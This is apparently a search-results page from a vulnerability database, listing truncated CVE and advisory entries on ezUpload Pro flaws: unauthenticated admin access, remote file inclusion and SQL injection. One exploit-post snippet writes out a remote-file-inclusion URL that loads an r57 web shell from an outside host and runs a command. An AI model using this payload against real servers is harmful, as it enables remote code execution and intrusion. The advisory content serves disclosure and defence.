18 matches found
EUVD-2005-4304
Malware in sbrugna...
EUVD-2006-2693
Malware in sbrugna...
EUVD-2005-4303
Malware in sbrugna...
CVE-2006-3939
ScriptsCenter ezUpload Pro 2.2.0 allows remote attackers to perform administrative activities without authentication in 1 filter.php, which permits changing the Extensions Mode file type; 2 access.php, which permits changing the Protection Method; 3 edituser.php, which permits adding upload...
CVE-2006-3939
CVE-2006-3939 affects ScriptsCenter ezUpload Pro 2.2.0. The vulnerability allows remote, unauthenticated administrative actions via multiple scripts: filter.php (changes to Extensions Mode file type), access.php (changes to Protection Method), edituser.php (adds upload privileges to user accounts...
CVE-2006-3939
ScriptsCenter ezUpload Pro 2.2.0 allows remote attackers to perform administrative activities without authentication in 1 filter.php, which permits changing the Extensions Mode file type; 2 access.php, which permits changing the Protection Method; 3 edituser.php, which permits adding upload...
EzUpload multi file vulnerabilities
I don't know anyone report this but I have detected this when test EzUpload Pro 2.2.0 Attacker can re-config EzUpload system without login. File: filter.php -- change Extensions Mode file type. File: access.php -- change Protection Method accept anyone upload file File: edituser.php -- Add user w...
Remote file inclusion
Multiple PHP remote file inclusion vulnerabilities in EzUpload Pro 2.10 allow remote attackers to execute arbitrary PHP code via a URL in the path parameter to 1 form.php, 2 customize.php, and 3 initialize.php...
CVE-2006-2694
Multiple PHP remote file inclusion vulnerabilities in EzUpload Pro 2.10 allow remote attackers to execute arbitrary PHP code via a URL in the path parameter to 1 form.php, 2 customize.php, and 3 initialize.php...
CVE-2006-2694
Multiple PHP remote file inclusion vulnerabilities in EzUpload Pro 2.10 allow remote attackers to execute arbitrary PHP code via a URL in the path parameter to 1 form.php, 2 customize.php, and 3 initialize.php...
CVE-2006-2694
CVE-2006-2694 affects EzUpload Pro 2.10 and describes multiple PHP remote file inclusion vulnerabilities. The issue allows remote attackers to execute arbitrary PHP code by providing a URL in the path parameter to any of three scripts: form.php, customize.php, and initialize.php. The underlying r...
multiple file include exploits in EzUpload Pro v2.10
multiple file include exploits in EzUpload Pro v2.10 forum type : EzUpload Pro v2.10 bug found by : black-code & sweet-devil team : site-down type : file include exploits : form.php http://www.example.com/path/form.php?path=http://rst.void.ru/download/r57shell.txt?&cmd=pwd customize.php...
CVE-2005-4309
SQL injection vulnerability in ezUpload Pro 2.2 and earlier allows remote attackers to execute arbitrary SQL commands via unspecified search module parameters...
CVE-2005-4308
index.php in ezUpload Pro 2.2 and earlier allows remote attackers to include files via the mode parameter...
CVE-2005-4309
SQL injection vulnerability in ezUpload Pro 2.2 and earlier allows remote attackers to execute arbitrary SQL commands via unspecified search module parameters...
CVE-2005-4308
index.php in ezUpload Pro 2.2 and earlier allows remote attackers to include files via the mode parameter...
CVE-2005-4308
Affected software: ezUpload Pro 2.2 and earlier. Vulnerability: remote attackers can include files via the mode parameter in index.php, enabling possible RFI. Root cause: improper handling of the mode parameter leading to file inclusion. Impact (per CVSS): partial confidentiality, integrity, and ...
CVE-2005-4309
CVE-2005-4309 concerns ezUpload Pro 2.2 and earlier. The vulnerability is an SQL injection in the application’s search module parameters, allowing remote attackers to execute arbitrary SQL commands. The available documents confirm the affected product (ezUpload Pro 2.2 and earlier) and the root c...